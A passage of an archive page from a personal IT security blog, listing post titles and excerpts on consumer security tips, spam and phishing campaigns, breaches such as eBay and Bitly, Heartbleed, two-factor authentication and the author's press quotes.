signs you should invest in your personal cyber security: logged on from various locations](https://www.sorinmustaca.com/410-signs-you-should-invest-in-your-personal-cyber-security-logged-on-from-various-locations/) - 4. You get warnings from online services that you logged on from various locations When you visit certain websites (e.g. Google, Facebook, LinkedIn) you get a warning if you are logged in on different devices on different geographical locations. If…Read more → from Improve Your Security http://ift.tt/1ugU32U via improve-your-security.org Get the free eBook from here - [3/10 signs you should invest in your personal cyber security: computer and browser slower than before](https://www.sorinmustaca.com/310-signs-you-should-invest-in-your-personal-cyber-security-computer-and-browser-slower-than-before/) - 3. Your computer and/or your browsing is slower than before Even if this is not necessarily a certain sign of a malware infection, it is often the case. If your browsing is also slower,…Read more → from Improve Your Security http://ift.tt/1rMttrD via improve-your-security.org Get the free eBook from here - [2/10 signs you should invest in your personal cyber security: one single password for everything](https://www.sorinmustaca.com/210-signs-you-should-invest-in-your-personal-cyber-security-one-single-password-for-everything/) - 2. You have one single password for all or most your online accounts In the last months many services were hacked and email addresses and password hashes (sometimes passwords in plain text) were stolen. This allows hackers to reverse engineer…Read more → from Improve Your Security http://ift.tt/1G5jrfZ via improve-your-security.org Get the free eBook from here - [1/10 signs you should invest in your personal cyber security: Unauthorized expenses](https://www.sorinmustaca.com/110-signs-you-should-invest-in-your-personal-cyber-security-unauthorized-expenses/) - You see in your account (debit or credit) an amount of money spent that you can’t explain If you see an in your bank account listing an amount which you know you didn’t spend nor authorized, no matter how small…Read more → from Improve Your Security http://ift.tt/1toAN0s via improve-your-security.org Get the free eBook from here - [Halloween special: 10 signs you should invest in your personal cyber security](https://www.sorinmustaca.com/halloween-special-10-signs-you-should-invest-in-your-personal-cyber-security/) - Today is the October 31st and it is Halloween in the USA and some European countries. What is special for this holiday is that people try to scare other people with horror costumes. Well, I don’t have costumes, but…Read more → from Improve Your Security http://ift.tt/1wjEln3 via improve-your-security.org Get the free eBook from here - [How do you react if you receive an email with subject "Your file has been uploaded"?](https://www.sorinmustaca.com/react-receive-email-subject-your-file-uploaded/) - A spam campaign sending emails from an "Auto ImageService" with the subject "Your file has been uploaded" is making its round on the Internet. The content of the email (see below) is very simple and advertises a link to a photo taken with a digital camera (DCIM stands for Digital Camera IMages) which was allegedly uploaded - [Why Facebook video autoplay is potentially dangerous, useless and how you can deactivate it](https://www.sorinmustaca.com/facebook-video-autoplay-potentially-dangerous-useless-deactivate/) - If you want to skip my rant about security and see how to do this, jump to the HOW TO areas below. Why Facebook video autoplay is potentially dangerous? Here are a couple of reasons why I think that autoplaying a video is potentially dangerous: - Facebook videos use on Windows Adobe Flash Player to render. - [Solved the problem with the Wordpress Editor writing white text on white background](https://www.sorinmustaca.com/solved-the-problem-with-the-wordpress-editor-writing-white-text-on-white-background/) - If you google, you will see tips to deactivate plugins and add all kind of things in the config files. In my case, when I upgraded from Wordpress 3.8 to 4.0, I started to have this problem. I deactivated the "Hello Dolly" plugin and everything worked perfectly! - [October is Cyber Security Awareness Month - Tips to improve your security](https://www.sorinmustaca.com/october-is-cyber-security-awareness-month/) - October is the Cybersecurity Awareness month. Awareness is the key to help others to not fall for the most scams. Here is a short list with tips to help you not fall prey to the online predators. A lot more like this is available in the free eBook: Improve your Security ### Never open - [Dropbox hacked?](https://www.sorinmustaca.com/dropbox-hacked/) - You probably have read on news portals that Dropbox was hacked and that some user accounts were compromised. Here is the alleged list of leaked user information. Dropbox is saying that the data is not valid. Apparently, Dropbox was not hacked. The company is clearly stating this on their blog. Recent news articles claiming that - [IT Security News in German](https://www.sorinmustaca.com/it-security-news-in-german/) - Because of the huge success of IT Security News website (www.itsecuritynews.info) which aggregates many portals with security news, I decided to replicate the same in German. The list of contributors is not yet as long as the one in English, but it will grow in time. Check the new website: IT Sicherheitsnews auf Deutsch: - ["Your messages will be deleted soon" - Facebook spam](https://www.sorinmustaca.com/your-messages-will-be-deleted-soon-facebook-spam/) - It seems that the most research on social engineering is done these days by spammers. Using the text "You haven't been to Facebook for a few days, and a lot happened while you were away", the spam message contains the trigger which will make many people click on the message: "Your messages will be deleted - [The PRICE of FREE](https://www.sorinmustaca.com/the-price-of-free/) - The idea of offering your product or a version of it for free has been a source of much debate. What is FREE and is FREE really, really, free as in gratis? Idea on writing this article came from reading this article on "Minimum Viable Free Product (MVFP)" by Nathan Taylor. Nathan is talking about "Minimum Viable - [Tips to secure your photos (including those with you naked)](https://www.sorinmustaca.com/tips-to-secure-your-photos-including-those-with-you-naked/) - You probably have heard by now that about 100 VIP iCloud accounts were hacked and photos with these persons naked were disclosed in various forums. I guess that by now it is quite needless to say that the best way…Read more → from Improve Your Security http://ift.tt/1AWOmFO via improve-your-security.org Get the free eBook from here - [iOS 8 brings a lot of security updates](https://www.sorinmustaca.com/ios-8-brings-a-lot-of-security-updates/) - You must have heard of the brand new version of iOS which was release yesterday: iOS v8. While the media is still considering and reconsidering their recommendations for each device on whether or not you should upgrade, here are my reasons to update my iPad 3rd generation. I don't have an iPhone anymore, I am an - [Quoted in Technewsworld.com: Botnet Twists the Knife in iCloud Security](https://www.sorinmustaca.com/quoted-in-technewsworld-com-botnet-twists-the-knife-in-icloud-security/) - Author:Richard Adhikari Article:Botnet Twists the Knife in iCloud Security Reduce, Reuse, Recycle For the record, though, "Waledac and Kelihos both send spam, and this is the reason for the confusion," IT security expert Sorin Mustaca told TechNewsWorld. Both use email to spread but in different ways. The same group of cybercriminals may have created the code for - [Security checklist for “Back to school”](https://www.sorinmustaca.com/security-checklist-for-back-to-school/) - The summer closes to end soon and we know that the next thing to happen is: children go back to school. Parents are always concerned (for good reasons) for what and how their children will do, and since a couple of years they have other concerns. Their children have smartphones, multiple online identities – parents - [Stock Spam is back!](https://www.sorinmustaca.com/stock-spam-is-back/) - Stock Spam is back! Did you miss it? I certainly didn't... What is interesting ? All these emails are unique. They are created for each email address and contain a unique identifier like 7b9212dcf62a731709b131d84f6e1cb8ec6e44d0bba47030be135d9f. This shows to me that they are generated using the same spam generator. They are being sent using compromised accounts - [When do you hire your Chief Privacy Officer?](https://www.sorinmustaca.com/when-do-you-hire-your-chief-privacy-officer/) - "Chief Privacy Officer" or "Data Protection Officer" is the name of the new job which will appear mandatory for businesses that are either located in the European Union or are doing business with EU. But, only if certain law is approved in October this year. Source: Networkworld.com The new law would apply to all companies - [Change default passwords from your Internet enabled devices](https://www.sorinmustaca.com/change-default-passwords-from-your-internet-enabled-devices/) - Useless to write again about changing default passwords? Think again... I just bought two brand-new TP-Link WiFi Range Extenders, models WA860RE and WA854RE. Latest version, latest firmware. Both come with default username and password: admin. It is written on their back... Once you login, you will go through as wizard which configures the device. But, it - [VirusBulletin.com: Cyber insurance, is it for you?](https://www.sorinmustaca.com/virusbulletin-com-cyber-insurance-is-it-for-you/) - This article was published first in Virus Bulletin. Sorin Mustaca looks at how companies trading online can insure the risks they run. Throughout its 25 year history, Virus Bulletin has regularly published technical analyses of the latest threats and defensive methods, and will continue to do so (with the material now available free of charge). We - [Nest thermostat vulnerable because of "developer mode"](https://www.sorinmustaca.com/nest-thermostat-vulnerable-because-of-developer-mode/) - The Nest thermostat is a smart home automation device that aims to learn about your heating and cooling habits to help optimize your scheduling and power usage. Debuted in 2010, the smart NEST devices have been proved a huge success that Google spent $3.2B to acquire the whole company. However, the smartness of the thermostat - [“Improve your Security” eBooks bundle](https://www.sorinmustaca.com/improve-your-security-ebooks-bundle/) - Hello dear readers, I finally found the time to optimize a bit the reading experience of the book. In order to allow everyone to quickly find what they are interested in, I split the book in topics and create individual…Read more → from Improve Your Security http://ift.tt/1kD4gTD via improve-your-security.org Get the free eBook from here - [Quoted in the (ISC)2 newsletter](https://www.sorinmustaca.com/quoted-in-the-isc2-newsletter/) - EMEA members are also sharing their expertise on the (ISC)² blog. Why we continue to fail on Cyber Security is the question explored in the latest post to the (ISC)² Blog by Germany-based CSSLP Sorin Mustaca, in his fourth post now archived to the Blog; It is actually 5th post, but it was my fault that - [Why is the news about 1.2 bil credentials stolen no news?](https://www.sorinmustaca.com/why-is-the-news-about-1-2-bil-credentials-stolen-no-news/) - Source : http://www.securityweek.com/feedback-friday-russian-hackers-obtain-12-billion-credentials-industry-reactions Sorin Mustaca, IT security expert and author of the Mustaca on Security blog: Every time I read such PR, it makes me think: "what are the press guys thinking when accepting such information without any kind of proof?" In my opinion, the most worrying part into this matter is the company that - [Why the Security of USB Is NOT Fundamentally Broken](https://www.sorinmustaca.com/why-the-security-of-usb-is-not-fundamentally-broken/) - I am very, very unhappy about the Fear, Uncertainty and Doubt (FUD) created by Karsten Nohl and Jakob Lell who will present their findings, as well as proof-of-concept software, at the Black Hatconference in Las Vegas this August. What makes me unhappy is how easy they generalize the fact that in some extraordinary circumstances some bad things can - [Why we continue to fail on cyber security](https://www.sorinmustaca.com/why-we-continue-to-fail-on-cyber-security/) - I've been asked a lot of times, especially when I was working for an antivirus producer, why can't we simply write a software that always protects the users. Well, there is a short answer and a long answer. Short answer: Because 100% security does not exist and because most people are hackable due to being ignorant - [Myth: I am invisible if I use ‘incognito’, ‘private’ or ‘guest’ browsing](https://www.sorinmustaca.com/myth-i-am-invisible-if-i-use-incognito-private-or-guest-browsing/) - Alternatively referred to as Private Browsing, InPrivate Browsing, and Private Window and informally as porn mode, Incognito is a mode that prevents some type of information from being stored locally. Pages you view in incognito tabs won’t stick around in your browser’s history, cookie store, or…Read more → from Improve Your Security http://ift.tt/1oCsoW5 via improve-your-security.org Get the free eBook from here - [Why do we continue to fail on cyber security](https://www.sorinmustaca.com/why-do-we-continue-to-fail-on-cyber-security/) - Short answer: Because anyone is hackable due to being ignorant on what security is (of course, until he is hacked). Long answer: Human ignorance, about everything that might happen and it is not certain to happen. According to Webster.com, the definition of IGNORANCE is: : a lack of knowledge, understanding, or education : the state of being ignorant - [500 readers of the “Improve Your Security” eBook](https://www.sorinmustaca.com/500-readers-of-the-improve-your-security-ebook/) - Thank you for your trust and interest in the book. For those of you who didn’t download the free eBook already, please have a look here: http://ift.tt/1rLpZcw Help me spread the word about this book: http://ift.tt/1rLq1BgRead more → from Improve Your Security http://ift.tt/1rLpZcA via improve-your-security.org Get the free eBook from here - [Why should you sign your binaries](https://www.sorinmustaca.com/why-should-you-sign-your-binaries/) - One of the larger questions facing the software industry is: How can I trust code that is published on the Internet? Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted since it was signed by use of - [Security through obscurity: Smart Light bulb Exposes Wi-Fi Password](https://www.sorinmustaca.com/security-through-obscurity-smart-light-bulb-exposes-wi-fi-password/) - A team of British security consultants (Context) hacked their way into a private Wi-Fi network -- using Lifx bulbs as the backdoor. In a typical Lifx setup, one bulb will automatically serve as the "master," communicating directly with your smartphone and then relaying all info to other "slave" bulbs. Context's team was able to hack their - [Myth: hiding your wireless network’s name improves its security](https://www.sorinmustaca.com/myth-hiding-your-wireless-networks-name-improves-its-security/) - Many think that what is not visible to an attacker is not going to be attacked. While this might be true for physical security, it doesn’t apply to cyber security. Security experts name this approach “security to obscurity” because it…Read more → from Improve Your Security http://ift.tt/1xXIzju via improve-your-security.org Get the free eBook from here - [Cyberattacks can damage your business. Permanently. Here is how to prepare yourself.](https://www.sorinmustaca.com/cyberattacks-can-damage-your-business-permanently-here-is-how-to-prepare-yourself/) - Dieser Artikel ist auf Deutsch verfügbar: http://tcadistribution.wordpress.com/2014/07/01/wie-cyberangriffe-auch-ihrem-unternehmen-schaden-konnen/ We’ve learned after the Code Spaces incident that started as a DDOS, continued with hacking and then blackmailing that cyberattacks are not something one should ignore. The long story of CodeSpaces put short was: a hacker started a DDOS on the company’s website and services. Nothing unusual, just - [Barack Obama invites you to participate in a US visa lottery (spam in German)](https://www.sorinmustaca.com/barack-obama-invites-you-to-participate-in-a-us-visa-lottery-spam-in-german/) - A German reader that wants to emigrate to the US expects nothing else than an invitation from the US President Barack Obama to participate to a VISA lottery. Or at least this is what the spammers that send this email think. To make things even more interesting, you also get a gratis - [Spam impersonating Google Support](https://www.sorinmustaca.com/spam-impersonating-google-support/) - I wrote already about spam impersonating various services just to make users click in order to visit a website. Most of the time, it is about online pharmacies. This time, it is Google's Support impersonated, as if it would contact the user to restore damaged messages. I leave aside the fact the this is technically - [Spam using WhatsApp voice mail](https://www.sorinmustaca.com/spam-using-whatsapp-voice-mail/) - I wrote before about various tricks that cybercriminals use to attract people to do something (btw, this is called "social engineering"). This time, they make use of the well-known WhatsApp (written like I did and not like in the screenshot below) to redirect users to an online pharmacy website. The - [Truecrypt shutdown - 5 questions that must be asked](https://www.sorinmustaca.com/truecrypt-shutdown-5-questions-that-must-be-asked/) - If you visit www.truecrypt.org you see this text below. If you install the software, you see it quite a couple of times. The domain www.truecrypt.org is only redirecting now to www.truecrypt.sourceforge.net. There are many articles written on this topic, especially on "WHY?". WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues This page exists - [Spotify hacked - there are some things we're not supposed to know](https://www.sorinmustaca.com/spotify-hacked-users-asked-to-change-their-password/) - Spotify has become now part of the bigger and bigger group of companies that had their internal network hacked. In an announcement to all users, Spotify says they became aware of some unauthorized access to their systems and internal company data. This is all good, but what exactly has been accessed? Further on, in the blog - [Experimenting with the feeds on ITSecurityNews.info](https://www.sorinmustaca.com/experimenting-with-the-feeds-on-itsecuritynews-info/) - I am performing some tests with the feed on ITSecurityNews.info because of some changes in various services i use. The website might experience some delays, duplicate posts or could be completely unavailable for some time. Sorry for the inconvenience. Sorin - [Quoted in SecurityWeek.com about the eBay data breach](https://www.sorinmustaca.com/quoted-in-securityweek-com-about-the-ebay-data-breach/) - eBay, Security Experts Say Database Dump is Fake By Eduard Kovacs on May 23, 2014 It’s uncertain who is behind the attack, but other cybercriminals and scammers are already trying to profit from the incident. Experts have reported seeing a higher number of PayPal and eBay phishing attacks, (links to this blog) and, a post on Pastebin was found offering - [Quoted in Dell Tech Page One: The value of not paying cyber extortionists](https://www.sorinmustaca.com/quoted-in-dell-tech-page-one-the-value-of-not-paying-cyber-extortionists/) - The value of not paying cyber extortionists By Erin Richey According to Sorin Mustaca, product manager for anti-virus company Avira GMBH, most extortionists negotiate in good faith. “In general, it is not common that the cybercriminals don’t keep their promise. They keep their promise because they want the next victim to pay,” wrote Mustaca in an email - [Phishing attempts making use of the eBay data breach](https://www.sorinmustaca.com/phishing-attempts-making-use-of-the-ebay-data-breach/) - I wrote about the eBay data breach where cybercriminals got access to some eBay employees' credentials and accessed the internal network. Names, email addresses, postal addresses, phone numbers, birth dates and encrpyted passwords were obtained. eBay started a campaign to reset the password of all their users. More information is available in their FAQ. Unfortunately, the breach - [Quoted in Forbes.com: New Computer Virus? Inform The Crowd](https://www.sorinmustaca.com/quoted-in-forbes-com-new-computer-virus-inform-the-crowd/) - New Computer Virus? Inform The Crowd Author: EMC Contributor Michael O’Dwyer Sorin Mustaca, an IT security expert at Avira, a global provider of anti-virus solutions headquartered in Tettnang, Germany, says, “the biggest threat when dealing with vulnerabilities or patches is that attackers are faster to use the intelligence than the vendors can create the patch or - [How to change your password on eBay after the security breach](https://www.sorinmustaca.com/how-to-change-your-password-on-ebay-after-the-security-breach/) - eBay informed customers to change their passwords after a security breach. Cyberattackers compromised a small number of employee log-in credentials, allowing unauthorized access to eBay’s corporate network, the company said. Working with law enforcement and leading security experts, the company is aggressively investigating the matter and applying the best forensics tools and practices to protect customers. - [Improve your browser’s security and privacy in 5 steps](https://www.sorinmustaca.com/improve-your-browsers-security-and-privacy-in-5-steps-2/) - No matter which source for statistics you take, all agree that the most used browsers are Chrome, Firefox and Internet Explorer. There have been many studies and tests done to find out which is the most secure of them. However, the tests are able only to show how each browser is matching a set of - [Improve your security: Review of the “Improve your Security” in the Virus Bulletin magazine](https://www.sorinmustaca.com/improve-your-security-review-of-the-improve-your-security-in-the-virus-bulletin-magazine/) - David Harley, published Don’t Forget to Write in February 2014 in the Virus Bulletin magazine. Because the copyright is held by Virus Bulletin Ltd, the article is made available on his site for personal use free of charge by permission of Virus Bulletin. You can download it from here: http://geekpeninsula.files.wordpress.com/2014/05/dharley-feb2014.pdf via improve-your-security.org Get the free eBook from here - [Improve your security: How to keep children safe on social media](https://www.sorinmustaca.com/improve-your-security-how-to-keep-children-safe-on-social-media/) - Source: http://ift.tt/1jBxESB Once your children start using the Internet independently, how do you keep them safe while allowing them to make the most of and enjoy social media websites like Facebook, Instagram and Twitter? Sorin Mustaca, Avira’s IT security expert, shares some practical strategies. It’s a constant battle and one many parents are very familiar - [Improve your security: Improve Your Product’s Security](https://www.sorinmustaca.com/improve-your-security-improve-your-products-security/) - Something great is coming! A new book from the series “Improve your security”: Improve Your Product’s Security It is going to be addressed to software developers and will show you how to : create the requirements for a secure product design your product to be secure from the beginning write more secure code test your - [Link shortening service Bitly hacked, users asked to reset credentials](https://www.sorinmustaca.com/link-shortening-service-bitly-hacked-users-asked-to-reset-credentials/) - Link shortening service Bitly late Thursday announced it has suffered a data breach, and urged all users to reset their credentials. Bitly’s CEO wrote in the blogpost that they have “reasons to believe that Bitly account credentials have been compromised; specifically, users’ email addresses, encrypted passwords, API keys and OAuth tokens”. This is really bad because it - [One month beyond the end of support of Windows XP](https://www.sorinmustaca.com/one-month-beyond-the-end-of-support-of-windows-xp/) - It is now a month since the official support from Microsoft has ended for Windows XP. Read here about strategies to move away from it. In the meanwhile, all XP users are getting this message: If you click on the link in the above picture, you see this page where you are kindly explained to move away - [Is Antivirus really dead? It depends on what you call Antivirus](https://www.sorinmustaca.com/is-antivirus-really-dead-it-depends-what-you-call-antivirus/) - Every once in a while, someone or some company in the information security industry comes up and says, “antivirus is dead.” This happened again last week, when Symantec’s Brian Dye told the Wall Street Journal that antivirus was dead and that it was no longer a “moneymaker.” http://news.softpedia.com/news/Is-Antivirus-Dead-It-Depends-on-How-You-Look-at-It-440993.shtml Avira Security Expert and Product Manager Sorin Mustaca tells - [Quoted in LinuxInsider.com: Snowden's Beloved Tails OS Reaches v1.0 Milestone](https://www.sorinmustaca.com/quoted-in-linuxinsider-com-snowdens-beloved-tails-os-reaches-v1-0-milestone/) - Snowden's Beloved Tails OS Reaches v1.0 Milestone By Richard Adhikari LinuxInsider 05/01/14 2:29 PM PT "Masking online activities is a critical capability in locales where political repression is common," said tech analyst Charles King. As for bad actors, "I wouldn't qualify Tails as being any more dangerous than other common devices used by criminals, including - [Microsoft fixes the Zero-Day exploit for IE 6 to 11, also on Windows XP](https://www.sorinmustaca.com/microsoft-fixes-the-zero-day-exploit-for-ie-6-to-11-also-on-windows-xp/) - We wrote about the new Zero-day vulnerability in the Internet Explorer affects all IE Versions from 6 to 11 which is being exploited in limited and targeted attacks. This vulnerability, identified as CVE-2014-1776, could allow remote code execution even if the user doesn’t click on anything. Microsoft kept their promise and fixed the problem in only 5 days after informing the - [How to protect yourself against the zero-day exploit for Internet Explorer 6 to 11](https://www.sorinmustaca.com/how-to-protect-yourself-against-the-zero-day-exploit-for-internet-explorer-6-to-11/) - A new Zero-day vulnerability in the Internet Explorer affects all IE Versions from 6 to 11 and is being exploited in limited and targeted attacks. This vulnerability, identified as CVE-2014-1776 ,could allow remote code execution even if the user doesn’t click on anything. Remote code execution means that attackers could distribute malware via a drive-by installation. The - [Quoted in BusinessNewsDaily: Beyond the Password: Why You Need 2-Factor Authentication](https://www.sorinmustaca.com/quoted-in-businessnewsdaily-beyond-the-password-why-you-need-2-factor-authentication/) - Beyond the Password: Why You Need 2-Factor Authentication Sue Marquette Poremba, Business News Daily Contributor | April 25, 2014 12:39pm ET While two-factor authentication may sound complicated and cumbersome, Sorin Mustaca, an IT security expert at Avira, said it's the only way to properly secure critical assets and mobile devices. "Passwords can be guessed and are - [How to have an overview of the IT Security News posts](https://www.sorinmustaca.com/how-to-have-an-overview-of-the-it-security-news-posts/) - The website ITSecurityNews.org publishes between 15-100 posts per day from the sources mentioned under SOURCES. IT Security News can be obtained on these channels: - Website: http://www.itsecuritynews.info and RSS feed http://www.itsecuritynews.info/feed - Google+: https://google.com/+ItsecuritynewsInfo - Facebook: https://www.facebook.com/ITSecNewsInfo - Twitter: https://twitter.com/It_securitynews If you want, you can even subscribe to the posts via email: Just subscribe on the page where you see this: SUBSCRIBE TO - [Quoted in Dell's TechPageOne: Are attacks by governments the next big threat?](https://www.sorinmustaca.com/quoted-in-dells-techpageone-are-attacks-by-governments-the-next-big-threat/) - Are attacks by governments the next big threat? Small and medium-sized enterprises may be at risk for state-sponsored hacking By Michael O'Dwyer - Tech Page One April 17 2014 “My personal blogs are daily attacked by at least 500 IP addresses, which come from all over the world. Is it safe to assume that the [IP addresses reflect - [Heartbleed's effect: a storm of password change requests](https://www.sorinmustaca.com/heartbleeds-effect-a-storm-of-password-change-requests/) - The Heartbleed problem is long fixed, at least on the major website around the world. But, the effects of this problem are by for not gone. I received at least 10 emails in the past week asking me nicely to change by password. Last week, a major vulnerability called "Heartbleed" surfaced for the - [Quoted in Dell Tech Page One: Small businesses brace for the end of Windows XP](https://www.sorinmustaca.com/quoted-in-dell-tech-page-one-small-businesses-brace-for-the-end-of-windows-xp/) - URL: http://techpageone.dell.com/technology/small-businesses-brace-end-windows-xp Sorin Mustaca, an IT security expert at Avira, a global provider of IT-security protection for computers, smartphones, servers and networks, agrees that Windows 7 may be an easier option. ”Our experience shows us that most software is still not adapted to make native use of Windows 8′s new APIs (application programming interfaces) and functionalities,” he says. - [What you need to know about the OpenSSL vulnerability “heartbleed”](https://www.sorinmustaca.com/what-you-need-to-know-about-the-openssl-vulnerability-heartbleed/) - At the beginning of this week a new vulnerability in OpenSSL called Heartbleed was made public. OpenSSL is the library used by most computers to encrypt data sent across the Internet and not only. OpenSSL is perhaps the most widely deployed SSL library and appears in a wide variety of applications, including a number of Linux distributions (see - [Quoted in the magazine Schwaebische: users should change their passwords immediately ](https://www.sorinmustaca.com/quoted-in-the-magazine-schwaebische-users-should-change-their-passwords-immediately/) - Source: http://www.schwaebische.de/politik/politik-aktuell_artikel,-%E2%80%9EAnwender-sollten-umgehend-das-Passwort-aendern%E2%80%9C-_arid,5622599.html RAVENSBURG / sz Sorin Mustaca ist Sicherheitsexperte bei dem IT-Unternehmen Avira in Tettnang. Er sprach mit Annabell Gutzmer über den aktuellen Datenklau und gab Tipps, wie man sich schützen kann. Wie reagiert Avira auf den aktuellen Datenklau? „Wir sensibilisieren unsere Anwender für den verantwortungsvollen Umgang mit ihren Daten. Auch wenn ein aktueller Virenschutz zur - [New case of identity theft – BSI in possession of 18 Million new accounts](https://www.sorinmustaca.com/new-case-of-identity-theft-bsi-in-possesion-of-18-milion-new-accounts/) - The Federal Office for Security in Information Technology (BSI) has informed the press (in German) about a new case of identity theft. Also this time a lot of German users are affected, according to the source, more than 3 million email addresses. BSI is working with big telecom providers like Telekom, Freenet, GMX, Kabel Deutschland, Vodafone, Web.de in - [Quoted in TechNewsWorld: Yahoo Issues Security Sitrep](https://www.sorinmustaca.com/quoted-in-technewsworld-yahoo-issues-security-sitrep/) - Yahoo Issues Security Sitrep By Richard Adhikari TechNewsWorld 04/03/14 2:05 PM PT Yahoo "should have done this earlier," Sorin Mustaca, IT security expert at Avira, told TechNewsWorld, "but they were tackling other problems -- losing users, revenue issues, losing market share -- so security, as a nonfunctional requirement, was left to the end." - [Improve your security: New version of the free eBook available: 3 new articles and improved description](https://www.sorinmustaca.com/improve-your-security-new-version-of-the-free-ebook-available-3-new-articles-and-improved-description/) - Hello dear reader, I have added new content in the book: - The long required introduction “Who should read this book?” which explains what the book is all about and why you should read it. - Chapter “Online Security”: Enable two-factor authentication for Tumbler - Chapter “Online safety for parents”: - Parental supervision for parents - [Improve your security: How to enable two-factor authentication for Tumblr](https://www.sorinmustaca.com/improve-your-security-how-to-enable-two-factor-authentication-for-tumblr/) - More and more social media websites and not only are enabling two-factor authentication in order to secure their users better. Following all other major portals, now also Tumblr allows users to enable it. Here is how to activate it in easy steps: Visit your account settings. Click the “Two-factor authentication” switch. Enter your phone number. - [New features in the Avira products for mobiles: Identity Safeguard, Browser Safety and more](https://www.sorinmustaca.com/new-features-in-the-avira-products-for-mobiles-identity-safeguard-browser-safety-and-more/) - Because of the growth of mobile commerce and the need to keep users safe as they increasingly use mobile devices, we are proud to announced today that we significantly upgraded the mobile solutions for iOS and Android. Avira Mobile Security for iOS The free app gets two new features: Identity Safeguard Avira is the only - [Improve your security: Who should read the “Improve your security” ebook?](https://www.sorinmustaca.com/improve-your-security-who-should-read-the-improve-your-security-ebook/) - You have an email account, a Facebook account, a LinkedIn or XING account. And you have passwords for them. You think you’re secure. But you are not. These days, cybercriminals aren’t only after our computers’ resources. They are interested in our identity, financial information and in our social media accounts. That’s why it’s important to - [Free Antivirus declared the winner in the Stiftung Warentest’s comparison test](https://www.sorinmustaca.com/free-antivirus-declared-the-winner-in-the-stiftung-warentests-comparison-test/) - The Stiftung Warentest just published the results of the test for the Internet security products. We are happy to announce that Avira Free Antivirus 2014 has received the result GOOD (2..2) and is the winner of the category free antivirus. Avira Internet Security Suite 2014 has received the result GOOD (2.1) and reached the second place - [Aktivierung der Zwei-Faktor-Authentifizierung bei Tumblr](https://www.sorinmustaca.com/aktivierung-der-zwei-faktor-authentifizierung-bei-tumblr/) - Immer mehr soziale Medien, aber auch andere Webseiten, nutzen die Zwei-Faktor-Authentifizierung, um ihre Nutzer besser schützen zu können. Nach allen anderen großen Webseiten macht nun auch Tumblr diesen Schritt. Befolgen Sie folgende einfache Schritte, um die Aktivierung durchzuführen: Gehen Sie zu Ihren Kontoeinstellungen. Klicken Sie die „Zwei-Faktor-Authentifizierung“ Schaltfläche an. Geben Sie Ihre Telefonnummer ein. Nun - [How to enable two-factor authentication for Tumblr](https://www.sorinmustaca.com/how-to-enable-two-factor-authentication-for-tumblr/) - More and more social media websites and not only are enabling two-factor authentication in order to secure their users better. Following all other major portals, now also Tumblr allows users to enable it. Here is how to activate it in easy steps: Visit your account settings. Click the “Two-factor authentication” switch. Enter your - [What are functional and non functional requirements and why both matter](https://www.sorinmustaca.com/functional-functional-requirements-matter/) - In software engineering (and Systems Engineering), a functional requirement defines a function of a system or its component. A function is described as a set of inputs, the behavior, and outputs (see also software). Functional requirements may be calculations, technical details, data manipulation and processing and other specific functionality that define what a system is supposed to accomplish. Behavioral requirements describing all the cases where - [Improve your security: Parental control for web browsing](https://www.sorinmustaca.com/improve-your-security-parental-control-for-web-browsing/) - There has been a lot written about whether or not it is ok for parents to control what their children are doing on the Internet. This starts with supervising which websites they are visiting and spending time on. Parental control applied to browsing means several things: Filter the websites which they are allowed to visit - [Improve your security: Parental supervision for sharing](https://www.sorinmustaca.com/improve-your-security-parental-supervision-for-sharing/) - Social media websites like Facebook, Instagram and alike are so heavily used because they make it easy for people to share information with others. Many don’t know that sometimes, what they share is shared with the entire user base of the social network, not only with their friends. Even if now the default settings have - [Improve your security: New version of the book published](https://www.sorinmustaca.com/improve-your-security-new-version-of-the-book-published/) - Hello dear reader, I finally manage to find some time to write the introduction chapter called “Who should read this book”. I also added a new chapter in the “Device Security”, related to Microsoft’s announcement for the end of support of Windows XP. Please help me to spread the word about the book by liking - [Improve your security: Myth #21: effort and costs are reduced if we outsource](https://www.sorinmustaca.com/improve-your-security-myth-21-effort-and-costs-are-reduced-if-we-outsource/) - Well, at the first glance, this Myth might actually be true… But… It is never so simple to speak only about cost and effort. Let’s take software development as main example (I am good at that). If you are a company that does something unrelated to software development, such an approach might make more sense. - [Goodbye, Windows XP?](https://www.sorinmustaca.com/goodbye-windows-xp/) - Microsoft will end the support for Windows XP, but the world won’t end because of this. In this article we will analyze what can happen, what you should do to avoid any damages and what you can do to continue to use Windows XP even after the support ends. No more technical - [Article in ComputerFraudandSecurity.com: Are your IT professionals prepared for the challenges to come?](https://www.sorinmustaca.com/article-computerfraudandsecurity-com-professionals-prepared-challenges-come/) - Article published in : ComputerFraudandSecurity.com Are your IT professionals prepared for the challenges to come? Three key security threats that you need to prepared for and how to mitigate them. The IT is probably the most dynamic business sector these days. There are so many things happening all the time and the risks - [Avira Protection Cloud available now for Free Antivirus](https://www.sorinmustaca.com/avira-protection-cloud-available-now-for-free-antivirus/) - In order to ensure that our customers are using the best protection available, we integrated the Avira Protection Cloud in all our premium products (consumer and business) . Avira takes now the next step and offers the best protection available to all its users: real-time scanning of programs with the Avira Protection Cloud. We are - [Avira Free Mac Security – Update 3 released](https://www.sorinmustaca.com/avira-free-mac-security-update-3-released/) - The Free Mac Security gets the Update 3 bringing performance improvements together with some stability improvements and additional features. The update comes automatically via the standard product update and it doesn’t require a reboot. Performance improvements We know that the product had some performance issues when the Time Machine or another backup program - [Improve your security: How to continue with the Chapter 7, Online safety for parents?](https://www.sorinmustaca.com/improve-your-security-how-to-continue-with-the-chapter-7-online-safety-for-parents/) - I started some time ago to write the chapter 7, Online safety for parents. There is so much to write about, that I don’t know where to start. Does anyone have some ideas or thoughts how should I start? Or, what do you expect to find in this chapter? I need some kind of prioritization - [The epic "goto fail" in Apple's SSL implementation](https://www.sorinmustaca.com/epic-goto-apples-ssl-bug/) - Security and Privacy I wrote here about the SSL bug and what it could do for your security and privacy... There is a website which helps users checking if they are affected by this bug: gotofail.com. Here are more details about the gotofail bug. Here is a pretty good explanation about how this bug "works" (courtesy - [Bring Your Own Identity (BYOI) is the next evolution of BYOD](https://www.sorinmustaca.com/bring-identity-byoi-evolution-byod/) - Many technology and security experts predict that “Bring Your Own Identity is the next evolution of BYOD. However, the experts are mixed on the security of BYOI. Some say it will make security stronger because of the way identity is used to connect to websites and networks; others say that by using third-party identities, employees - [Quoted in Forbes.com: One Password For Work And Home -- Is This The Future?](https://www.sorinmustaca.com/quoted-forbes-com-password-work-home-future/) - URL: http://www.forbes.com/sites/emc/2014/02/25/one-password-for-work-and-home-is-this-the-future/ Author: Michael O’Dwyer Sorin Mustaca, an IT security expert for Avira, 